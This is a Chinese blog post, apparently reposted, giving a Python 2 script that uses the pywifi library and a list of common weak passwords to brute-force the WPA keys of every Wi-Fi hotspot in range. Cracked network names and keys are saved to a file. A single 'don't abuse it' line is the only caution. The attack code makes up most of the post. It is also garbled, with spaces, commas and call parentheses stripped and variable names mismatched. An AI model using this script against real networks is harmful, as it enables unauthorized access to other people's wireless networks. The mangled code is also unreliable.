「短暂」的春节假期已经结束了,想必今天大家都已经开工了。新的一年,一起继续学习 Python,鸡年雄起~~ 本文仅供大家参考,不要滥用哦。 原文:https://my.oschina.net/Apathy/blog/821039
环境准备首先,这个模块在 win 下有点鸡肋,作者在调用 WLANAPI 时没有做好 WLANSECURITYATTRIBUTES 的封装,所以推荐在 linux 下跑,我测试所使用的是 Kali 2.0 自带 python 2.7.6 ,可直接通过 pip install pywifi 安装。 导入模块这里用的模块就这三个。pywifi 的 wifiutillinux.py 脚本的 sendcmdtowpas 方法中的 if reply != b'OK\n':判断需要修改,不然会有很多的提示信息。 frompywifiimport*
importtime
importsys
字典准备效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的 wifi 弱口令 TOP 10: 12345678 123456789 88888888 1234567890 00000000 87654321 66668888 11223344 147258369 11111111
配置扫描器推荐扫描时常可以设置在15-20秒之间。测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义。到时候就算破解成功的热点,信号也好不到哪里 defmain:
#扫描时常
scantimes=3
#单个密码测试延迟
testtimes=15
output=sys.stdout
#结果文件保存路径
files='TestRes.txt'
#字典列表
keys=open(sys.argv[1],'r').readlines
print'|KEYS %s'%(len(keys))
#实例化一个pywifi对象
wifi=PyWiFi
#选择定一个网卡并赋值于iface
iface=wifi.interfaces[0]
#通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置
scanres=scans(ifacescantimes)
#统计附近被发现的热点数量
nums=len(scanres)
print'|SCAN GET %s'%(nums)
print'%s\n%-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s \n%s'%('-'*706'WIFIID'18'SSID OR BSSID'2'N'4'time'7'signal'10'KEYNUM'10'KEY''='*70)
#将每一个热点信息逐一进行测试
forixinenumerate(scanres):
#测试完毕后,成功的结果讲存储到files中
res=test(nums-iifacexkeysoutputtesttimes)
ifres:
open(files'a').write(res)
扫描周围热点defscans(facetimeout):
#开始扫描
face.scan
time.sleep(timeout)
#在若干秒后获取扫描结果
returnface.scan_results
热点测试这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。 deftest(ifacexkeystuts):
#显示对应网络名称,考虑到部分中文名啧显示bssid
showID=x.bssidiflen(x.ssid)>len(x.bssid)elsex.ssid
#迭代字典并进行爆破
fornkinenumerate(key):
x.key=k.strip
#移除所有热点配置
face.remove_all_network_profiles
#讲封装好的目标尝试连接
face.connect(face.add_network_profile(x))
#初始化状态码,考虑到用0会发生些逻辑错误
code=10
t1=time.time
#循环刷新状态,如果置为0则密码错误,如超时则进行下一个
whilecode!=0:
time.sleep(0.1)
code=face.status
now=time.time-t1
ifnowts:
break
stu.write('\r%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s'%(6i18showIDcode5now7x.signal10len(key)-n10k.replace('\n''')))
stu.flush
ifcode==4:
face.disconnect
return'%-*s| %s | %*s |%*s\n'%(20x.ssidx.bssid3x.signal15k)
returnFalse
案例这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了 _ * WIFIID * _ 热点的 id 号 每跑一个会减1 _ * SSID OR BSSID * _ 热点的 ssid 名或 mac 地址 _ * N * _ 对热点的连接状态,这个在 * _time_ * 当前所花去的时间 * _signal_ * 热点的信号强度,若小越好 * _KEYNUM_ * 测试密码的 id 每跑一个会减1 * _KEY_ * 当前测试的密码
结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 - - 传送门后台回复关键词 wifi,即可获取相关字典、源码和模块的分享链接。 题图:pexels,CC0 授权。
|